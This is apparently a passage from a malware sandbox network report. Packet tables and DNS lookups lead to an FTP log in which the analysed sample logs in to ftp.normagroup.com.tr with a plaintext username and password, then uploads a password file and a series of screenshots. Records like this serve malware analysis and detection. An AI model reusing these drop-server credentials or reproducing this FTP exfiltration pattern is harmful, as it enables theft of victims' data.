Aug 18, 2024 18:31:54.986124039 CEST	52992	54722	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:54.990303040 CEST	52992	54722	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:54.990598917 CEST	52992	54722	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:54.990647078 CEST	52992	54722	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:54.990674973 CEST	52992	54722	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:54.990727901 CEST	52992	54722	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:54.990875006 CEST	52992	54722	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:54.990886927 CEST	52992	54722	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:54.990897894 CEST	52992	54722	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:54.990911007 CEST	52992	54722	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:54.990923882 CEST	52992	54722	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:54.991225958 CEST	52992	54722	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:54.991421938 CEST	54722	52992	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:55.019845963 CEST	54709	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:55.459788084 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:55.504743099 CEST	54709	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:32:00.710980892 CEST	54709	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:32:00.715936899 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:00.937393904 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:00.937809944 CEST	54723	64947	192.168.2.5	104.247.165.99
Aug 18, 2024 18:32:00.943785906 CEST	64947	54723	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:00.943862915 CEST	54723	64947	192.168.2.5	104.247.165.99
Aug 18, 2024 18:32:00.943945885 CEST	54709	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:32:00.951394081 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:01.566754103 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:01.566941977 CEST	54723	64947	192.168.2.5	104.247.165.99
Aug 18, 2024 18:32:01.571799040 CEST	64947	54723	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:01.571813107 CEST	64947	54723	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:01.571827888 CEST	64947	54723	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:01.571866035 CEST	64947	54723	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:01.571887970 CEST	54723	64947	192.168.2.5	104.247.165.99
Aug 18, 2024 18:32:01.571913004 CEST	64947	54723	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:01.571922064 CEST	54723	64947	192.168.2.5	104.247.165.99
Aug 18, 2024 18:32:01.571924925 CEST	64947	54723	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:01.571968079 CEST	54723	64947	192.168.2.5	104.247.165.99
Aug 18, 2024 18:32:01.572055101 CEST	64947	54723	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:01.572088957 CEST	64947	54723	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:01.572093010 CEST	54723	64947	192.168.2.5	104.247.165.99
Aug 18, 2024 18:32:01.572160959 CEST	54723	64947	192.168.2.5	104.247.165.99
Aug 18, 2024 18:32:01.572175026 CEST	64947	54723	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:01.572191000 CEST	64947	54723	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:01.572217941 CEST	54723	64947	192.168.2.5	104.247.165.99
Aug 18, 2024 18:32:01.572227955 CEST	54723	64947	192.168.2.5	104.247.165.99
Aug 18, 2024 18:32:01.576713085 CEST	64947	54723	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:01.576766014 CEST	54723	64947	192.168.2.5	104.247.165.99
Aug 18, 2024 18:32:01.576770067 CEST	64947	54723	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:01.576782942 CEST	64947	54723	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:01.576797009 CEST	64947	54723	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:01.576811075 CEST	54723	64947	192.168.2.5	104.247.165.99
Aug 18, 2024 18:32:01.576833963 CEST	54723	64947	192.168.2.5	104.247.165.99
Aug 18, 2024 18:32:01.576857090 CEST	54723	64947	192.168.2.5	104.247.165.99
Aug 18, 2024 18:32:01.576878071 CEST	64947	54723	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:01.576890945 CEST	64947	54723	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:01.576925039 CEST	54723	64947	192.168.2.5	104.247.165.99
Aug 18, 2024 18:32:01.576942921 CEST	54723	64947	192.168.2.5	104.247.165.99
Aug 18, 2024 18:32:01.576972008 CEST	64947	54723	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:01.577085018 CEST	64947	54723	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:01.577117920 CEST	64947	54723	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:01.577182055 CEST	54723	64947	192.168.2.5	104.247.165.99
Aug 18, 2024 18:32:01.577203989 CEST	64947	54723	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:01.577230930 CEST	64947	54723	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:01.577246904 CEST	54723	64947	192.168.2.5	104.247.165.99
Aug 18, 2024 18:32:01.577315092 CEST	64947	54723	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:01.581605911 CEST	64947	54723	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:01.581954956 CEST	64947	54723	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:01.582056999 CEST	64947	54723	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:01.582077980 CEST	64947	54723	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:01.582101107 CEST	64947	54723	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:01.582160950 CEST	64947	54723	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:01.582175970 CEST	64947	54723	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:01.582215071 CEST	64947	54723	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:01.582246065 CEST	64947	54723	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:01.582276106 CEST	64947	54723	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:01.582303047 CEST	64947	54723	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:01.582355022 CEST	64947	54723	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:01.582715988 CEST	64947	54723	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:01.582758904 CEST	54723	64947	192.168.2.5	104.247.165.99
Aug 18, 2024 18:32:01.769929886 CEST	54709	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:32:02.880126953 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:02.881829977 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:02.881927013 CEST	54709	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:32:02.882865906 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:02.882924080 CEST	54709	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:32:06.742815971 CEST	54709	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:32:06.747601986 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:06.969521046 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:06.969896078 CEST	54724	63505	192.168.2.5	104.247.165.99
Aug 18, 2024 18:32:06.974898100 CEST	63505	54724	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:06.974972963 CEST	54724	63505	192.168.2.5	104.247.165.99
Aug 18, 2024 18:32:06.975121975 CEST	54709	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:32:06.979903936 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:07.584602118 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:07.584876060 CEST	54724	63505	192.168.2.5	104.247.165.99
Aug 18, 2024 18:32:07.589751005 CEST	63505	54724	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:07.589761972 CEST	63505	54724	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:07.589782953 CEST	63505	54724	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:07.589792967 CEST	63505	54724	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:07.589797974 CEST	63505	54724	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:07.589814901 CEST	63505	54724	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:07.589837074 CEST	54724	63505	192.168.2.5	104.247.165.99
Aug 18, 2024 18:32:07.589881897 CEST	54724	63505	192.168.2.5	104.247.165.99
Aug 18, 2024 18:32:07.589936018 CEST	63505	54724	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:07.589946032 CEST	63505	54724	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:07.589953899 CEST	63505	54724	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:07.589999914 CEST	54724	63505	192.168.2.5	104.247.165.99
Aug 18, 2024 18:32:07.590018988 CEST	54724	63505	192.168.2.5	104.247.165.99
Aug 18, 2024 18:32:07.590049028 CEST	63505	54724	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:07.590095997 CEST	54724	63505	192.168.2.5	104.247.165.99
Aug 18, 2024 18:32:07.594686031 CEST	63505	54724	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:07.594696045 CEST	63505	54724	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:07.594710112 CEST	63505	54724	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:07.594717979 CEST	63505	54724	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:07.594737053 CEST	54724	63505	192.168.2.5	104.247.165.99
Aug 18, 2024 18:32:07.594759941 CEST	54724	63505	192.168.2.5	104.247.165.99
Aug 18, 2024 18:32:07.594856024 CEST	63505	54724	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:07.594865084 CEST	63505	54724	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:07.594880104 CEST	63505	54724	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:07.594911098 CEST	54724	63505	192.168.2.5	104.247.165.99
Aug 18, 2024 18:32:07.594930887 CEST	54724	63505	192.168.2.5	104.247.165.99
Aug 18, 2024 18:32:07.595026016 CEST	63505	54724	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:07.595079899 CEST	54724	63505	192.168.2.5	104.247.165.99
Aug 18, 2024 18:32:07.595088005 CEST	63505	54724	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:07.595099926 CEST	63505	54724	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:07.595138073 CEST	54724	63505	192.168.2.5	104.247.165.99
Aug 18, 2024 18:32:07.599365950 CEST	63505	54724	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:07.599581957 CEST	63505	54724	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:07.599605083 CEST	63505	54724	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:07.599659920 CEST	63505	54724	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:07.599684000 CEST	63505	54724	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:07.599786043 CEST	63505	54724	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:07.600087881 CEST	63505	54724	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:07.600162029 CEST	63505	54724	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:07.600563049 CEST	63505	54724	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:07.600621939 CEST	54724	63505	192.168.2.5	104.247.165.99
Aug 18, 2024 18:32:07.629200935 CEST	54709	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:32:08.059526920 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:32:08.113576889 CEST	54709	21	192.168.2.5	104.247.165.99

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 18, 2024 18:28:03.731657982 CEST	59528	53	192.168.2.5	1.1.1.1
Aug 18, 2024 18:28:04.446727037 CEST	53	59528	1.1.1.1	192.168.2.5
Aug 18, 2024 18:28:16.339735985 CEST	53	55631	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 18, 2024 18:28:03.731657982 CEST	192.168.2.5	1.1.1.1	0x865e	Standard query (0)	ftp.normagroup.com.tr	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Aug 18, 2024 18:28:04.446727037 CEST	1.1.1.1	192.168.2.5	0x865e	No error (0)	ftp.normagroup.com.tr		104.247.165.99	A (IP address)	IN (0x0001)	false
Aug 18, 2024 18:28:05.560401917 CEST	1.1.1.1	192.168.2.5	0xf3ba	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Aug 18, 2024 18:28:05.560401917 CEST	1.1.1.1	192.168.2.5	0xf3ba	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Aug 18, 2024 18:29:07.322751045 CEST	1.1.1.1	192.168.2.5	0xb144	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Aug 18, 2024 18:29:07.322751045 CEST	1.1.1.1	192.168.2.5	0xb144	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false

FTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Aug 18, 2024 18:28:05.128313065 CEST	21	49705	104.247.165.99	192.168.2.5	220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 9 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 9 of 50 allowed.220-Local time is now 19:28. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 9 of 50 allowed.220-Local time is now 19:28. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 9 of 50 allowed.220-Local time is now 19:28. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 9 of 50 allowed.220-Local time is now 19:28. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
Aug 18, 2024 18:28:05.128619909 CEST	49705	21	192.168.2.5	104.247.165.99	USER admin@normagroup.com.tr
Aug 18, 2024 18:28:05.352305889 CEST	21	49705	104.247.165.99	192.168.2.5	331 User admin@normagroup.com.tr OK. Password required
Aug 18, 2024 18:28:05.352473021 CEST	49705	21	192.168.2.5	104.247.165.99	PASS Qb.X[.j.Yfm[
Aug 18, 2024 18:28:05.612520933 CEST	21	49705	104.247.165.99	192.168.2.5	230 OK. Current restricted directory is /
Aug 18, 2024 18:28:05.833256960 CEST	21	49705	104.247.165.99	192.168.2.5	504 Unknown command
Aug 18, 2024 18:28:05.838334084 CEST	49705	21	192.168.2.5	104.247.165.99	PWD
Aug 18, 2024 18:28:06.058387995 CEST	21	49705	104.247.165.99	192.168.2.5	257 "/" is your current location
Aug 18, 2024 18:28:06.058582067 CEST	49705	21	192.168.2.5	104.247.165.99	TYPE I
Aug 18, 2024 18:28:06.277971029 CEST	21	49705	104.247.165.99	192.168.2.5	200 TYPE is now 8-bit binary
Aug 18, 2024 18:28:06.278140068 CEST	49705	21	192.168.2.5	104.247.165.99	PASV
Aug 18, 2024 18:28:06.497411966 CEST	21	49705	104.247.165.99	192.168.2.5	227 Entering Passive Mode (104,247,165,99,202,36)
Aug 18, 2024 18:28:06.503220081 CEST	49705	21	192.168.2.5	104.247.165.99	STOR PW_user-610930_2024_08_18_12_28_02.html
Aug 18, 2024 18:28:07.130264997 CEST	21	49705	104.247.165.99	192.168.2.5	150 Accepted data connection
Aug 18, 2024 18:28:07.356411934 CEST	21	49705	104.247.165.99	192.168.2.5	226-File successfully transferred 226-File successfully transferred226 0.226 seconds (measured here), 1.38 Kbytes per second
Aug 18, 2024 18:29:32.633308887 CEST	49705	21	192.168.2.5	104.247.165.99	PASV
Aug 18, 2024 18:29:32.851903915 CEST	21	49705	104.247.165.99	192.168.2.5	227 Entering Passive Mode (104,247,165,99,199,104)
Aug 18, 2024 18:29:32.857587099 CEST	49705	21	192.168.2.5	104.247.165.99	STOR SC_user-610930_2024_09_16_07_27_03.jpeg
Aug 18, 2024 18:29:33.529258013 CEST	21	49705	104.247.165.99	192.168.2.5	150 Accepted data connection
Aug 18, 2024 18:29:34.031513929 CEST	21	49705	104.247.165.99	192.168.2.5	226-File successfully transferred 226-File successfully transferred226 0.539 seconds (measured here), 124.20 Kbytes per second
Aug 18, 2024 18:29:43.758579969 CEST	49705	21	192.168.2.5	104.247.165.99	PASV
Aug 18, 2024 18:29:43.978152990 CEST	21	49705	104.247.165.99	192.168.2.5	227 Entering Passive Mode (104,247,165,99,208,42)
Aug 18, 2024 18:29:43.986974955 CEST	49705	21	192.168.2.5	104.247.165.99	STOR SC_user-610930_2024_09_23_07_43_23.jpeg
Aug 18, 2024 18:29:44.610410929 CEST	21	49705	104.247.165.99	192.168.2.5	150 Accepted data connection
Aug 18, 2024 18:29:45.097763062 CEST	21	49705	104.247.165.99	192.168.2.5	226-File successfully transferred 226-File successfully transferred226 0.488 seconds (measured here), 133.75 Kbytes per second
Aug 18, 2024 18:29:48.525130033 CEST	49705	21	192.168.2.5	104.247.165.99	PASV
Aug 18, 2024 18:29:48.747360945 CEST	21	49705	104.247.165.99	192.168.2.5	227 Entering Passive Mode (104,247,165,99,213,249)
Aug 18, 2024 18:29:48.753701925 CEST	49705	21	192.168.2.5	104.247.165.99	STOR SC_user-610930_2024_09_27_14_25_34.jpeg
Aug 18, 2024 18:29:49.378923893 CEST	21	49705	104.247.165.99	192.168.2.5	150 Accepted data connection
Aug 18, 2024 18:29:49.875055075 CEST	21	49705	104.247.165.99	192.168.2.5	226-File successfully transferred 226-File successfully transferred226 0.497 seconds (measured here), 131.23 Kbytes per second
Aug 18, 2024 18:30:02.483196020 CEST	49705	21	192.168.2.5	104.247.165.99	PASV
Aug 18, 2024 18:30:02.711546898 CEST	21	49705	104.247.165.99	192.168.2.5	227 Entering Passive Mode (104,247,165,99,206,100)
Aug 18, 2024 18:30:02.727756023 CEST	49705	21	192.168.2.5	104.247.165.99	STOR SC_user-610930_2024_10_05_16_23_13.jpeg
Aug 18, 2024 18:30:03.356327057 CEST	21	49705	104.247.165.99	192.168.2.5	150 Accepted data connection
Aug 18, 2024 18:30:03.938325882 CEST	21	49705	104.247.165.99	192.168.2.5	226-File successfully transferred 226-File successfully transferred226 0.582 seconds (measured here), 112.02 Kbytes per second
Aug 18, 2024 18:30:10.046627998 CEST	49705	21	192.168.2.5	104.247.165.99	PASV
Aug 18, 2024 18:30:10.265959978 CEST	21	49705	104.247.165.99	192.168.2.5	227 Entering Passive Mode (104,247,165,99,208,231)
Aug 18, 2024 18:30:10.271620989 CEST	49705	21	192.168.2.5	104.247.165.99	STOR SC_user-610930_2024_10_11_05_39_19.jpeg
Aug 18, 2024 18:30:10.908037901 CEST	21	49705	104.247.165.99	192.168.2.5	150 Accepted data connection
Aug 18, 2024 18:30:11.406085968 CEST	21	49705	104.247.165.99	192.168.2.5	226-File successfully transferred 226-File successfully transferred226 0.498 seconds (measured here), 131.01 Kbytes per second
Aug 18, 2024 18:30:16.794215918 CEST	49705	21	192.168.2.5	104.247.165.99	PASV
Aug 18, 2024 18:30:17.014482021 CEST	21	49705	104.247.165.99	192.168.2.5	227 Entering Passive Mode (104,247,165,99,247,210)
Aug 18, 2024 18:30:17.024995089 CEST	49705	21	192.168.2.5	104.247.165.99	STOR SC_user-610930_2024_10_16_09_26_17.jpeg
Aug 18, 2024 18:30:17.662544966 CEST	21	49705	104.247.165.99	192.168.2.5	150 Accepted data connection
Aug 18, 2024 18:30:18.161355019 CEST	21	49705	104.247.165.99	192.168.2.5	226-File successfully transferred 226-File successfully transferred226 0.498 seconds (measured here), 130.77 Kbytes per second
Aug 18, 2024 18:30:28.997075081 CEST	21	54709	104.247.165.99	192.168.2.5	220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 50 allowed.220-Local time is now 19:30. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 50 allowed.220-Local time is now 19:30. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 50 allowed.220-Local time is now 19:30. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 50 allowed.220-Local time is now 19:30. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
Aug 18, 2024 18:30:28.997710943 CEST	54709	21	192.168.2.5	104.247.165.99	USER admin@normagroup.com.tr
Aug 18, 2024 18:30:29.228157043 CEST	21	54709	104.247.165.99	192.168.2.5	331 User admin@normagroup.com.tr OK. Password required
Aug 18, 2024 18:30:29.228765965 CEST	54709	21	192.168.2.5	104.247.165.99	PASS Qb.X[.j.Yfm[
Aug 18, 2024 18:30:29.494338036 CEST	21	54709	104.247.165.99	192.168.2.5	230 OK. Current restricted directory is /
Aug 18, 2024 18:30:29.720576048 CEST	21	54709	104.247.165.99	192.168.2.5	504 Unknown command
Aug 18, 2024 18:30:29.720738888 CEST	54709	21	192.168.2.5	104.247.165.99	PWD
Aug 18, 2024 18:30:29.946521044 CEST	21	54709	104.247.165.99	192.168.2.5	257 "/" is your current location
Aug 18, 2024 18:30:29.946682930 CEST	54709	21	192.168.2.5	104.247.165.99	TYPE I
Aug 18, 2024 18:30:30.172161102 CEST	21	54709	104.247.165.99	192.168.2.5	200 TYPE is now 8-bit binary
Aug 18, 2024 18:30:30.172461987 CEST	54709	21	192.168.2.5	104.247.165.99	PASV
Aug 18, 2024 18:30:30.398494959 CEST	21	54709	104.247.165.99	192.168.2.5	227 Entering Passive Mode (104,247,165,99,243,132)
Aug 18, 2024 18:30:30.404067993 CEST	54709	21	192.168.2.5	104.247.165.99	STOR SC_user-610930_2024_10_25_18_20_08.jpeg
Aug 18, 2024 18:30:31.031451941 CEST	21	54709	104.247.165.99	192.168.2.5	150 Accepted data connection
Aug 18, 2024 18:30:31.526422977 CEST	21	54709	104.247.165.99	192.168.2.5	226-File successfully transferred 226-File successfully transferred226 0.495 seconds (measured here), 131.72 Kbytes per second
Aug 18, 2024 18:30:51.180192947 CEST	54709	21	192.168.2.5	104.247.165.99	PASV
Aug 18, 2024 18:30:51.405646086 CEST	21	54709	104.247.165.99	192.168.2.5	227 Entering Passive Mode (104,247,165,99,255,76)
Aug 18, 2024 18:30:51.416189909 CEST	54709	21	192.168.2.5	104.247.165.99	STOR SC_user-610930_2024_11_09_01_55_30.jpeg
Aug 18, 2024 18:30:52.040934086 CEST	21	54709	104.247.165.99	192.168.2.5	150 Accepted data connection
Aug 18, 2024 18:30:53.313438892 CEST	21	54709	104.247.165.99	192.168.2.5	226-File successfully transferred 226-File successfully transferred226 0.501 seconds (measured here), 129.99 Kbytes per second
Aug 18, 2024 18:30:53.314029932 CEST	21	54709	104.247.165.99	192.168.2.5	226-File successfully transferred 226-File successfully transferred226 0.501 seconds (measured here), 129.99 Kbytes per second
Aug 18, 2024 18:30:53.314167023 CEST	21	54709	104.247.165.99	192.168.2.5	226-File successfully transferred 226-File successfully transferred226 0.501 seconds (measured here), 129.99 Kbytes per second
Aug 18, 2024 18:30:54.757297039 CEST	54709	21	192.168.2.5	104.247.165.99	PASV
Aug 18, 2024 18:30:54.984229088 CEST	21	54709	104.247.165.99	192.168.2.5	227 Entering Passive Mode (104,247,165,99,229,60)
Aug 18, 2024 18:30:54.994147062 CEST	54709	21	192.168.2.5	104.247.165.99	STOR SC_user-610930_2024_11_12_23_57_03.jpeg
Aug 18, 2024 18:30:55.614424944 CEST	21	54709	104.247.165.99	192.168.2.5	150 Accepted data connection
Aug 18, 2024 18:30:56.077661991 CEST	21	54709	104.247.165.99	192.168.2.5	226-File successfully transferred 226-File successfully transferred226 0.463 seconds (measured here), 140.74 Kbytes per second
Aug 18, 2024 18:30:58.108545065 CEST	54709	21	192.168.2.5	104.247.165.99	PASV
Aug 18, 2024 18:30:58.336074114 CEST	21	54709	104.247.165.99	192.168.2.5	227 Entering Passive Mode (104,247,165,99,207,209)
Aug 18, 2024 18:30:58.341660023 CEST	54709	21	192.168.2.5	104.247.165.99	STOR SC_user-610930_2024_11_16_15_55_08.jpeg
Aug 18, 2024 18:30:58.952266932 CEST	21	54709	104.247.165.99	192.168.2.5	150 Accepted data connection
Aug 18, 2024 18:30:59.404707909 CEST	21	54715	104.247.165.99	192.168.2.5	220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 11 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 11 of 50 allowed.220-Local time is now 19:30. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 11 of 50 allowed.220-Local time is now 19:30. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 11 of 50 allowed.220-Local time is now 19:30. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 11 of 50 allowed.220-Local time is now 19:30. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
Aug 18, 2024 18:30:59.405026913 CEST	54715	21	192.168.2.5	104.247.165.99	USER admin@normagroup.com.tr
Aug 18, 2024 18:30:59.415445089 CEST	21	54709	104.247.165.99	192.168.2.5	226-File successfully transferred 226-File successfully transferred226 0.463 seconds (measured here), 140.76 Kbytes per second
Aug 18, 2024 18:30:59.621162891 CEST	21	54715	104.247.165.99	192.168.2.5	331 User admin@normagroup.com.tr OK. Password required
Aug 18, 2024 18:30:59.624773979 CEST	54715	21	192.168.2.5	104.247.165.99	PASS Qb.X[.j.Yfm[
Aug 18, 2024 18:30:59.903948069 CEST	21	54715	104.247.165.99	192.168.2.5	230 OK. Current restricted directory is /
Aug 18, 2024 18:31:00.119587898 CEST	21	54715	104.247.165.99	192.168.2.5	504 Unknown command
Aug 18, 2024 18:31:00.119718075 CEST	54715	21	192.168.2.5	104.247.165.99	PWD
Aug 18, 2024 18:31:00.334731102 CEST	21	54715	104.247.165.99	192.168.2.5	257 "/" is your current location
Aug 18, 2024 18:31:00.334928989 CEST	54715	21	192.168.2.5	104.247.165.99	TYPE I
Aug 18, 2024 18:31:00.550632000 CEST	21	54715	104.247.165.99	192.168.2.5	200 TYPE is now 8-bit binary
Aug 18, 2024 18:31:00.550786972 CEST	54715	21	192.168.2.5	104.247.165.99	PASV
Aug 18, 2024 18:31:00.766277075 CEST	21	54715	104.247.165.99	192.168.2.5	227 Entering Passive Mode (104,247,165,99,193,22)
Aug 18, 2024 18:31:00.778983116 CEST	54715	21	192.168.2.5	104.247.165.99	STOR SC_user-610930_2024_11_19_05_17_03.jpeg
Aug 18, 2024 18:31:01.412650108 CEST	21	54715	104.247.165.99	192.168.2.5	150 Accepted data connection
Aug 18, 2024 18:31:01.901299000 CEST	21	54715	104.247.165.99	192.168.2.5	226-File successfully transferred 226-File successfully transferred226 0.490 seconds (measured here), 133.08 Kbytes per second
Aug 18, 2024 18:31:22.203300953 CEST	54709	21	192.168.2.5	104.247.165.99	PASV
Aug 18, 2024 18:31:22.474817991 CEST	21	54709	104.247.165.99	192.168.2.5	227 Entering Passive Mode (104,247,165,99,225,12)
Aug 18, 2024 18:31:22.480463982 CEST	54709	21	192.168.2.5	104.247.165.99	STOR SC_user-610930_2024_12_05_15_08_08.jpeg
Aug 18, 2024 18:31:23.119225025 CEST	21	54709	104.247.165.99	192.168.2.5	150 Accepted data connection
Aug 18, 2024 18:31:23.607978106 CEST	21	54709	104.247.165.99	192.168.2.5	226-File successfully transferred 226-File successfully transferred226 0.488 seconds (measured here), 133.57 Kbytes per second
Aug 18, 2024 18:31:26.134306908 CEST	54709	21	192.168.2.5	104.247.165.99	PASV
Aug 18, 2024 18:31:26.498522043 CEST	21	54709	104.247.165.99	192.168.2.5	227 Entering Passive Mode (104,247,165,99,222,234)
Aug 18, 2024 18:31:26.504038095 CEST	54709	21	192.168.2.5	104.247.165.99	STOR SC_user-610930_2024_12_09_13_04_17.jpeg
